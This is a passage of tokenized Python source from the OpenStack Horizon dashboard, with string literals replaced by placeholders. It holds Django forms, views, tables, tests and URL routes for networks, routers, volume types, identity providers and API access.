if network_type not in self . 
nettypes_with_seg_id : <EOL> del self . _errors [ '<STR_LIT>' ] <EOL> elif network_type in self . nettypes_with_seg_id : <EOL> seg_id = data . get ( '<STR_LIT>' ) <EOL> seg_id_range = { '<STR_LIT>' : self . seg_id_range [ network_type ] [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' : self . seg_id_range [ network_type ] [ <NUM_LIT:1> ] } <EOL> if seg_id < seg_id_range [ '<STR_LIT>' ] or seg_id > seg_id_range [ '<STR_LIT>' ] : <EOL> msg = ( _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> % { '<STR_LIT>' : network_type , <EOL> '<STR_LIT>' : seg_id_range [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : seg_id_range [ '<STR_LIT>' ] } ) <EOL> self . _errors [ '<STR_LIT>' ] = self . error_class ( [ msg ] ) <EOL> class UpdateNetwork ( forms . SelfHandlingForm ) : <EOL> name = forms . CharField ( label = _ ( "<STR_LIT:Name>" ) , required = False ) <EOL> tenant_id = forms . CharField ( widget = forms . HiddenInput ) <EOL> network_id = forms . CharField ( label = _ ( "<STR_LIT>" ) , <EOL> widget = forms . TextInput ( <EOL> attrs = { '<STR_LIT>' : '<STR_LIT>' } ) ) <EOL> admin_state = forms . ChoiceField ( choices = [ ( True , _ ( '<STR_LIT>' ) ) , <EOL> ( False , _ ( '<STR_LIT>' ) ) ] , <EOL> label = _ ( "<STR_LIT>" ) ) <EOL> shared = forms . BooleanField ( label = _ ( "<STR_LIT>" ) , required = False ) <EOL> external = forms . BooleanField ( label = _ ( "<STR_LIT>" ) , required = False ) <EOL> failure_url = '<STR_LIT>' <EOL> def handle ( self , request , data ) : <EOL> try : <EOL> params = { '<STR_LIT:name>' : data [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT>' : ( data [ '<STR_LIT>' ] == '<STR_LIT:True>' ) , <EOL> '<STR_LIT>' : data [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : data [ '<STR_LIT>' ] } <EOL> network = api . neutron . network_update ( request , <EOL> self . initial [ '<STR_LIT>' ] , <EOL> ** params ) <EOL> msg = _ ( '<STR_LIT>' ) % data [ '<STR_LIT:name>' ] <EOL> LOG . debug ( msg ) <EOL> messages . 
success ( request , msg ) <EOL> return network <EOL> except Exception : <EOL> msg = _ ( '<STR_LIT>' ) % data [ '<STR_LIT:name>' ] <EOL> LOG . info ( msg ) <EOL> redirect = reverse ( self . failure_url ) <EOL> exceptions . handle ( request , msg , redirect = redirect ) </s>
<s> from openstack_dashboard . dashboards . admin . routers . extensions . extraroutes import tables as ertbl <EOL> from openstack_dashboard . dashboards . admin . routers . ports import tables as ptbl <EOL> from openstack_dashboard . dashboards . project . routers . extensions . extraroutes import tabs as er_tabs <EOL> from openstack_dashboard . dashboards . project . routers . extensions . routerrules import tabs as rr_tabs <EOL> from openstack_dashboard . dashboards . project . routers import tabs as r_tabs <EOL> class OverviewTab ( r_tabs . OverviewTab ) : <EOL> template_name = "<STR_LIT>" <EOL> class ExtraRoutesTab ( er_tabs . ExtraRoutesTab ) : <EOL> table_classes = ( ertbl . AdminRouterRoutesTable , ) <EOL> class InterfacesTab ( r_tabs . InterfacesTab ) : <EOL> table_classes = ( ptbl . PortsTable , ) <EOL> class RouterDetailTabs ( r_tabs . RouterDetailTabs ) : <EOL> tabs = ( OverviewTab , InterfacesTab , ExtraRoutesTab , rr_tabs . RulesGridTab , <EOL> rr_tabs . RouterRulesTab ) <EOL> sticky = True </s>
<s> """<STR_LIT>""" <EOL> from django . core . urlresolvers import reverse <EOL> from django . core . urlresolvers import reverse_lazy <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import exceptions <EOL> from horizon import forms <EOL> from horizon . utils import memoized <EOL> from horizon import views <EOL> from openstack_dashboard import api <EOL> from openstack_dashboard . dashboards . admin . volumes . volume_types import forms as volume_types_forms <EOL> class CreateVolumeTypeView ( forms . ModalFormView ) : <EOL> form_class = volume_types_forms . CreateVolumeType <EOL> modal_header = _ ( "<STR_LIT>" ) <EOL> modal_id = "<STR_LIT>" <EOL> template_name = '<STR_LIT>' <EOL> submit_label = _ ( "<STR_LIT>" ) <EOL> submit_url = reverse_lazy ( "<STR_LIT>" ) <EOL> success_url = reverse_lazy ( '<STR_LIT>' ) <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> class VolumeTypeEncryptionDetailView ( views . HorizonTemplateView ) : <EOL> template_name = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( VolumeTypeEncryptionDetailView , self ) . get_context_data ( ** kwargs ) <EOL> context [ "<STR_LIT>" ] = self . get_data ( ) <EOL> return context <EOL> @ memoized . memoized_method <EOL> def get_data ( self ) : <EOL> try : <EOL> volume_type_id = self . kwargs [ '<STR_LIT>' ] <EOL> self . _volume_type_encryption = api . cinder . volume_encryption_type_get ( self . request , volume_type_id ) <EOL> volume_type_list = api . cinder . volume_type_list ( self . request ) <EOL> for volume_type in volume_type_list : <EOL> if volume_type . id == volume_type_id : <EOL> self . name = volume_type . name <EOL> self . _volume_type_encryption . name = self . name <EOL> except Exception : <EOL> redirect = reverse ( '<STR_LIT>' ) <EOL> exceptions . handle ( self . 
request , <EOL> _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> redirect = redirect ) <EOL> return None <EOL> return self . _volume_type_encryption <EOL> class CreateVolumeTypeEncryptionView ( forms . ModalFormView ) : <EOL> form_class = volume_types_forms . CreateVolumeTypeEncryption <EOL> form_id = "<STR_LIT>" <EOL> modal_header = _ ( "<STR_LIT>" ) <EOL> modal_id = "<STR_LIT>" <EOL> template_name = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> submit_label = _ ( "<STR_LIT>" ) <EOL> submit_url = "<STR_LIT>" <EOL> success_url = reverse_lazy ( '<STR_LIT>' ) <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> @ memoized . memoized_method <EOL> def get_name ( self ) : <EOL> if not hasattr ( self , "<STR_LIT:name>" ) : <EOL> self . name = _get_volume_type_name ( self . request , self . kwargs ) <EOL> return self . name <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( CreateVolumeTypeEncryptionView , self ) . get_context_data ( ** kwargs ) <EOL> context [ '<STR_LIT>' ] = self . kwargs [ '<STR_LIT>' ] <EOL> args = ( self . kwargs [ '<STR_LIT>' ] , ) <EOL> context [ '<STR_LIT>' ] = reverse ( self . submit_url , args = args ) <EOL> return context <EOL> def get_initial ( self ) : <EOL> name = self . get_name ( ) <EOL> return { '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : self . kwargs [ '<STR_LIT>' ] } <EOL> class EditVolumeTypeView ( forms . ModalFormView ) : <EOL> form_class = volume_types_forms . EditVolumeType <EOL> template_name = '<STR_LIT>' <EOL> success_url = reverse_lazy ( '<STR_LIT>' ) <EOL> cancel_url = reverse_lazy ( '<STR_LIT>' ) <EOL> submit_label = _ ( '<STR_LIT>' ) <EOL> @ memoized . memoized_method <EOL> def get_data ( self ) : <EOL> try : <EOL> volume_type_id = self . kwargs [ '<STR_LIT>' ] <EOL> volume_type = api . cinder . volume_type_get ( self . request , <EOL> volume_type_id ) <EOL> except Exception : <EOL> error_message = _ ( <EOL> '<STR_LIT>' ) % volume_type_id <EOL> exceptions . handle ( self . 
request , <EOL> error_message , <EOL> redirect = self . success_url ) <EOL> return volume_type <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( EditVolumeTypeView , self ) . get_context_data ( ** kwargs ) <EOL> context [ '<STR_LIT>' ] = self . get_data ( ) <EOL> return context <EOL> def get_initial ( self ) : <EOL> volume_type = self . get_data ( ) <EOL> return { '<STR_LIT:id>' : self . kwargs [ '<STR_LIT>' ] , <EOL> '<STR_LIT:name>' : volume_type . name , <EOL> '<STR_LIT:description>' : getattr ( volume_type , '<STR_LIT:description>' , "<STR_LIT>" ) } <EOL> def _get_volume_type_name ( request , kwargs ) : <EOL> try : <EOL> volume_type_list = api . cinder . volume_type_list ( request ) <EOL> for volume_type in volume_type_list : <EOL> if volume_type . id == kwargs [ '<STR_LIT>' ] : <EOL> return volume_type . name <EOL> except Exception : <EOL> msg = _ ( '<STR_LIT>' ) <EOL> url = reverse ( '<STR_LIT>' ) <EOL> exceptions . handle ( request , msg , redirect = url ) <EOL> class UpdateVolumeTypeEncryptionView ( forms . ModalFormView ) : <EOL> form_class = volume_types_forms . UpdateVolumeTypeEncryption <EOL> form_id = "<STR_LIT>" <EOL> modal_header = _ ( "<STR_LIT>" ) <EOL> modal_id = "<STR_LIT>" <EOL> template_name = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> submit_label = _ ( "<STR_LIT>" ) <EOL> submit_url = "<STR_LIT>" <EOL> success_url = reverse_lazy ( '<STR_LIT>' ) <EOL> def get_object ( self ) : <EOL> if not hasattr ( self , "<STR_LIT>" ) : <EOL> try : <EOL> self . _object = api . cinder . volume_encryption_type_get ( self . request , <EOL> self . kwargs [ '<STR_LIT>' ] ) <EOL> except Exception : <EOL> msg = _ ( '<STR_LIT>' ) <EOL> url = reverse ( '<STR_LIT>' ) <EOL> exceptions . handle ( self . request , msg , redirect = url ) <EOL> return self . _object <EOL> @ memoized . memoized_method <EOL> def get_name ( self ) : <EOL> if not hasattr ( self , "<STR_LIT:name>" ) : <EOL> self . 
name = _get_volume_type_name ( self . request , self . kwargs ) <EOL> return self . name <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( UpdateVolumeTypeEncryptionView , self ) . get_context_data ( ** kwargs ) <EOL> context [ '<STR_LIT>' ] = self . kwargs [ '<STR_LIT>' ] <EOL> args = ( self . kwargs [ '<STR_LIT>' ] , ) <EOL> context [ '<STR_LIT>' ] = reverse ( self . submit_url , args = args ) <EOL> return context <EOL> def get_initial ( self ) : <EOL> encryption_type = self . get_object ( ) <EOL> name = self . get_name ( ) <EOL> return { '<STR_LIT>' : encryption_type . volume_type_id , <EOL> '<STR_LIT>' : encryption_type . control_location , <EOL> '<STR_LIT>' : encryption_type . key_size , <EOL> '<STR_LIT>' : encryption_type . provider , <EOL> '<STR_LIT>' : encryption_type . cipher , <EOL> '<STR_LIT:name>' : name } <EOL> class CreateQosSpecView ( forms . ModalFormView ) : <EOL> form_class = volume_types_forms . CreateQosSpec <EOL> modal_header = _ ( "<STR_LIT>" ) <EOL> modal_id = "<STR_LIT>" <EOL> template_name = '<STR_LIT>' <EOL> success_url = reverse_lazy ( '<STR_LIT>' ) <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> submit_label = _ ( "<STR_LIT>" ) <EOL> submit_url = reverse_lazy ( <EOL> "<STR_LIT>" ) <EOL> class EditQosSpecConsumerView ( forms . ModalFormView ) : <EOL> form_class = volume_types_forms . EditQosSpecConsumer <EOL> modal_header = _ ( "<STR_LIT>" ) <EOL> modal_id = "<STR_LIT>" <EOL> template_name = '<STR_LIT>' <EOL> submit_label = _ ( "<STR_LIT>" ) <EOL> submit_url = "<STR_LIT>" <EOL> success_url = reverse_lazy ( '<STR_LIT>' ) <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( EditQosSpecConsumerView , self ) . get_context_data ( ** kwargs ) <EOL> context [ '<STR_LIT>' ] = self . kwargs [ "<STR_LIT>" ] <EOL> args = ( self . kwargs [ '<STR_LIT>' ] , ) <EOL> context [ '<STR_LIT>' ] = reverse ( self . submit_url , args = args ) <EOL> return context <EOL> @ memoized . 
memoized_method <EOL> def get_object ( self , * args , ** kwargs ) : <EOL> qos_spec_id = self . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> self . _object = api . cinder . qos_spec_get ( self . request , qos_spec_id ) <EOL> except Exception : <EOL> msg = _ ( '<STR_LIT>' ) <EOL> exceptions . handle ( self . request , msg ) <EOL> return self . _object <EOL> def get_initial ( self ) : <EOL> qos_spec = self . get_object ( ) <EOL> qos_spec_id = self . kwargs [ '<STR_LIT>' ] <EOL> return { '<STR_LIT>' : qos_spec_id , <EOL> '<STR_LIT>' : qos_spec } <EOL> class ManageQosSpecAssociationView ( forms . ModalFormView ) : <EOL> form_class = volume_types_forms . ManageQosSpecAssociation <EOL> modal_header = _ ( "<STR_LIT>" ) <EOL> modal_id = "<STR_LIT>" <EOL> template_name = '<STR_LIT>' <EOL> submit_label = _ ( "<STR_LIT>" ) <EOL> submit_url = "<STR_LIT>" "<STR_LIT>" <EOL> success_url = reverse_lazy ( '<STR_LIT>' ) <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( ManageQosSpecAssociationView , self ) . get_context_data ( ** kwargs ) <EOL> context [ '<STR_LIT>' ] = self . kwargs [ "<STR_LIT>" ] <EOL> args = ( self . kwargs [ '<STR_LIT>' ] , ) <EOL> context [ '<STR_LIT>' ] = reverse ( self . submit_url , args = args ) <EOL> return context <EOL> @ memoized . memoized_method <EOL> def get_object ( self , * args , ** kwargs ) : <EOL> type_id = self . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> self . _object = api . cinder . volume_type_get ( self . request , type_id ) <EOL> except Exception : <EOL> msg = _ ( '<STR_LIT>' ) <EOL> exceptions . handle ( self . request , msg ) <EOL> return self . _object <EOL> @ memoized . memoized_method <EOL> def get_qos_specs ( self , * args , ** kwargs ) : <EOL> try : <EOL> return api . cinder . qos_spec_list ( self . request ) <EOL> except Exception : <EOL> exceptions . handle ( self . 
request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> def find_current_qos_spec_association ( self , vol_type_id ) : <EOL> qos_specs = self . get_qos_specs ( ) <EOL> if qos_specs : <EOL> try : <EOL> for qos_spec in qos_specs : <EOL> type_ids = api . cinder . qos_spec_get_associations ( self . request , <EOL> qos_spec . id ) <EOL> for vtype in type_ids : <EOL> if vtype . id == vol_type_id : <EOL> return qos_spec <EOL> except Exception : <EOL> exceptions . handle ( <EOL> self . request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> return None <EOL> def get_initial ( self ) : <EOL> volume_type = self . get_object ( ) <EOL> vol_type_id = self . kwargs [ '<STR_LIT>' ] <EOL> cur_qos_spec_id = None <EOL> cur_qos_spec_name = None <EOL> qos_spec = self . find_current_qos_spec_association ( vol_type_id ) <EOL> if qos_spec : <EOL> cur_qos_spec_id = qos_spec . id <EOL> cur_qos_spec_name = qos_spec . name <EOL> return { '<STR_LIT>' : vol_type_id , <EOL> '<STR_LIT:name>' : getattr ( volume_type , '<STR_LIT:name>' , None ) , <EOL> '<STR_LIT>' : cur_qos_spec_id , <EOL> '<STR_LIT>' : cur_qos_spec_name , <EOL> '<STR_LIT>' : self . get_qos_specs ( ) } </s>
<s> from django . core . urlresolvers import reverse <EOL> from django import http <EOL> from mox3 . mox import IgnoreArg <EOL> from mox3 . mox import IsA <EOL> from openstack_dashboard import api <EOL> from openstack_dashboard . test import helpers as test <EOL> IDPS_INDEX_URL = reverse ( '<STR_LIT>' ) <EOL> IDPS_REGISTER_URL = reverse ( '<STR_LIT>' ) <EOL> IDPS_UPDATE_URL = reverse ( '<STR_LIT>' , <EOL> args = [ '<STR_LIT>' ] ) <EOL> IDPS_DETAIL_URL = reverse ( '<STR_LIT>' , <EOL> args = [ '<STR_LIT>' ] ) <EOL> class IdPsViewTests ( test . BaseAdminViewTests ) : <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , ) } ) <EOL> def test_index ( self ) : <EOL> api . keystone . identity_provider_list ( IgnoreArg ( ) ) . AndReturn ( self . identity_providers . list ( ) ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( IDPS_INDEX_URL ) <EOL> self . assertTemplateUsed ( res , '<STR_LIT>' ) <EOL> self . assertItemsEqual ( res . context [ '<STR_LIT>' ] . data , <EOL> self . identity_providers . list ( ) ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , ) } ) <EOL> def test_create ( self ) : <EOL> idp = self . identity_providers . first ( ) <EOL> api . keystone . identity_provider_create ( IgnoreArg ( ) , <EOL> idp . id , <EOL> description = idp . description , <EOL> enabled = idp . enabled , <EOL> remote_ids = idp . remote_ids ) . AndReturn ( idp ) <EOL> self . mox . ReplayAll ( ) <EOL> formData = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:id>' : idp . id , <EOL> '<STR_LIT:description>' : idp . description , <EOL> '<STR_LIT>' : idp . enabled , <EOL> '<STR_LIT>' : '<STR_LIT:U+002CU+0020>' . join ( idp . remote_ids ) } <EOL> res = self . client . post ( IDPS_REGISTER_URL , formData ) <EOL> self . assertNoFormErrors ( res ) <EOL> self . assertMessageCount ( success = <NUM_LIT:1> ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) <EOL> def test_update ( self ) : <EOL> idp = self . 
identity_providers . first ( ) <EOL> new_description = '<STR_LIT>' <EOL> api . keystone . identity_provider_get ( IsA ( http . HttpRequest ) , idp . id ) . AndReturn ( idp ) <EOL> api . keystone . identity_provider_update ( IsA ( http . HttpRequest ) , <EOL> idp . id , <EOL> description = new_description , <EOL> enabled = idp . enabled , <EOL> remote_ids = idp . remote_ids ) . AndReturn ( None ) <EOL> self . mox . ReplayAll ( ) <EOL> formData = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:id>' : idp . id , <EOL> '<STR_LIT:description>' : new_description , <EOL> '<STR_LIT>' : idp . enabled , <EOL> '<STR_LIT>' : '<STR_LIT:U+002CU+0020>' . join ( idp . remote_ids ) } <EOL> res = self . client . post ( IDPS_UPDATE_URL , formData ) <EOL> self . assertNoFormErrors ( res ) <EOL> self . assertMessageCount ( success = <NUM_LIT:1> ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) <EOL> def test_delete ( self ) : <EOL> idp = self . identity_providers . first ( ) <EOL> api . keystone . identity_provider_list ( IsA ( http . HttpRequest ) ) . AndReturn ( self . identity_providers . list ( ) ) <EOL> api . keystone . identity_provider_delete ( IsA ( http . HttpRequest ) , <EOL> idp . id ) . AndReturn ( None ) <EOL> self . mox . ReplayAll ( ) <EOL> formData = { '<STR_LIT:action>' : '<STR_LIT>' % idp . id } <EOL> res = self . client . post ( IDPS_INDEX_URL , formData ) <EOL> self . assertNoFormErrors ( res ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) <EOL> def test_detail ( self ) : <EOL> idp = self . identity_providers . first ( ) <EOL> api . keystone . identity_provider_get ( IsA ( http . HttpRequest ) , idp . id ) . AndReturn ( idp ) <EOL> api . keystone . protocol_list ( IsA ( http . HttpRequest ) , idp . id ) . AndReturn ( self . idp_protocols . list ( ) ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( IDPS_DETAIL_URL ) <EOL> self . 
assertTemplateUsed ( <EOL> res , '<STR_LIT>' ) <EOL> self . assertTemplateUsed ( res , '<STR_LIT>' ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) <EOL> def test_detail_protocols ( self ) : <EOL> idp = self . identity_providers . first ( ) <EOL> api . keystone . identity_provider_get ( IsA ( http . HttpRequest ) , idp . id ) . AndReturn ( idp ) <EOL> api . keystone . protocol_list ( IsA ( http . HttpRequest ) , idp . id ) . AndReturn ( self . idp_protocols . list ( ) ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( IDPS_DETAIL_URL + '<STR_LIT>' ) <EOL> self . assertTemplateUsed ( <EOL> res , '<STR_LIT>' ) <EOL> self . assertTemplateUsed ( res , '<STR_LIT>' ) <EOL> self . assertItemsEqual ( res . context [ '<STR_LIT>' ] . data , <EOL> self . idp_protocols . list ( ) ) </s>
<s> from django . template . defaultfilters import title <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from openstack_auth import utils <EOL> from horizon import tables <EOL> from openstack_dashboard import api <EOL> from openstack_dashboard . dashboards . project . access_and_security . api_access import forms as project_forms <EOL> from openstack_dashboard import policy <EOL> def pretty_service_names ( name ) : <EOL> name = name . replace ( '<STR_LIT:->' , '<STR_LIT:U+0020>' ) <EOL> if name in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> name = name . upper ( ) <EOL> else : <EOL> name = title ( name ) <EOL> return name <EOL> class DownloadEC2 ( tables . LinkAction ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> verbose_name_plural = _ ( "<STR_LIT>" ) <EOL> icon = "<STR_LIT>" <EOL> url = "<STR_LIT>" <EOL> policy_rules = ( ( "<STR_LIT>" , "<STR_LIT>" ) , ) <EOL> def allowed ( self , request , datum = None ) : <EOL> return api . base . is_service_enabled ( request , '<STR_LIT>' ) <EOL> class DownloadOpenRC ( tables . LinkAction ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> verbose_name_plural = _ ( "<STR_LIT>" ) <EOL> icon = "<STR_LIT>" <EOL> url = "<STR_LIT>" <EOL> def allowed ( self , request , datum = None ) : <EOL> return utils . get_keystone_version ( ) >= <NUM_LIT:3> <EOL> class DownloadOpenRCv2 ( tables . LinkAction ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> verbose_name_plural = _ ( "<STR_LIT>" ) <EOL> icon = "<STR_LIT>" <EOL> url = "<STR_LIT>" <EOL> class ViewCredentials ( tables . LinkAction ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> classes = ( "<STR_LIT>" , ) <EOL> icon = "<STR_LIT>" <EOL> url = "<STR_LIT>" <EOL> class RecreateCredentials ( tables . 
LinkAction ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> classes = ( "<STR_LIT>" , ) <EOL> icon = "<STR_LIT>" <EOL> url = "<STR_LIT>" <EOL> policy_rules = ( ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> action_type = "<STR_LIT>" <EOL> def allowed ( self , request , datum = None ) : <EOL> try : <EOL> target = { "<STR_LIT>" : request . user . id } <EOL> if ( api . base . is_service_enabled ( request , '<STR_LIT>' ) and <EOL> project_forms . get_ec2_credentials ( request ) and <EOL> policy . check ( ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) ) , <EOL> request , target = target ) ) : <EOL> return True <EOL> except Exception : <EOL> pass <EOL> return False <EOL> class EndpointsTable ( tables . DataTable ) : <EOL> api_name = tables . Column ( '<STR_LIT:type>' , <EOL> verbose_name = _ ( "<STR_LIT>" ) , <EOL> filters = ( pretty_service_names , ) ) <EOL> api_endpoint = tables . Column ( '<STR_LIT>' , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> class Meta ( object ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> multi_select = False <EOL> table_actions = ( DownloadOpenRCv2 , DownloadOpenRC , DownloadEC2 , <EOL> ViewCredentials , RecreateCredentials ) </s>
<s> from django . utils . translation import ugettext_lazy as _ <EOL> import horizon <EOL> class Containers ( horizon . Panel ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = '<STR_LIT>' <EOL> permissions = ( '<STR_LIT>' , ) </s>
<s> from django . utils . translation import pgettext_lazy <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import tables <EOL> from horizon . utils import filters <EOL> class AuditTable ( tables . DataTable ) : <EOL> ACTION_DISPLAY_CHOICES = ( <EOL> ( "<STR_LIT>" , pgettext_lazy ( "<STR_LIT>" , u"<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , pgettext_lazy ( "<STR_LIT>" , u"<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , pgettext_lazy ( "<STR_LIT>" , u"<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , pgettext_lazy ( "<STR_LIT>" , u"<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , pgettext_lazy ( "<STR_LIT>" , u"<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , pgettext_lazy ( "<STR_LIT>" , <EOL> u"<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , pgettext_lazy ( "<STR_LIT>" , u"<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , pgettext_lazy ( "<STR_LIT>" , u"<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , pgettext_lazy ( "<STR_LIT>" , u"<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , pgettext_lazy ( "<STR_LIT>" , u"<STR_LIT>" ) ) , <EOL> ( "<STR_LIT:start>" , pgettext_lazy ( "<STR_LIT>" , u"<STR_LIT>" ) ) , <EOL> ) <EOL> request_id = tables . Column ( '<STR_LIT>' , <EOL> verbose_name = _ ( '<STR_LIT>' ) ) <EOL> action = tables . Column ( '<STR_LIT:action>' , verbose_name = _ ( '<STR_LIT>' ) , <EOL> display_choices = ACTION_DISPLAY_CHOICES ) <EOL> start_time = tables . Column ( '<STR_LIT>' , verbose_name = _ ( '<STR_LIT>' ) , <EOL> filters = [ filters . parse_isotime ] ) <EOL> user_id = tables . Column ( '<STR_LIT>' , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> message = tables . Column ( '<STR_LIT:message>' , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> class Meta ( object ) : <EOL> name = '<STR_LIT>' <EOL> verbose_name = _ ( '<STR_LIT>' ) <EOL> def get_object_id ( self , datum ) : <EOL> return datum . request_id </s>
<s> from django . conf . urls import url <EOL> from openstack_dashboard . dashboards . project . network_topology import views <EOL> urlpatterns = [ <EOL> url ( r'<STR_LIT>' , views . NetworkTopologyView . as_view ( ) , name = '<STR_LIT:index>' ) , <EOL> url ( r'<STR_LIT>' , views . RouterView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . NetworkView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . InstanceView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . RouterDetailView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . NTAddInterfaceView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . NetworkDetailView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . NTCreateSubnetView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . JSONView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . NTLaunchInstanceView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . NTCreateNetworkView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . NTCreateRouterView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> ] </s>
<s> import logging <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import tabs <EOL> from openstack_dashboard . api import neutron as api <EOL> from openstack_dashboard . dashboards . project . routers . extensions . extraroutes import tables as ertbl <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class ExtraRoutesTab ( tabs . TableTab ) : <EOL> table_classes = ( ertbl . ExtraRoutesTable , ) <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> def allowed ( self , request ) : <EOL> try : <EOL> return api . is_extension_supported ( request , '<STR_LIT>' ) <EOL> except Exception : <EOL> LOG . info ( _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> return False <EOL> def get_extra_routes_data ( self ) : <EOL> try : <EOL> extraroutes = getattr ( self . tab_group . kwargs [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> except AttributeError : <EOL> extraroutes = [ ] <EOL> return [ api . RouterStaticRoute ( r ) for r in extraroutes ] </s>
<s> from django . conf . urls import url <EOL> from openstack_dashboard . dashboards . project . stacks import views <EOL> urlpatterns = [ <EOL> url ( r'<STR_LIT>' , views . IndexView . as_view ( ) , name = '<STR_LIT:index>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . SelectTemplateView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . CreateStackView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . PreviewTemplateView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . PreviewStackView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . PreviewStackDetailsView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . DetailView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . ChangeTemplateView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . EditStackView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . ResourceView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . JSONView . as_view ( ) , name = '<STR_LIT>' ) , 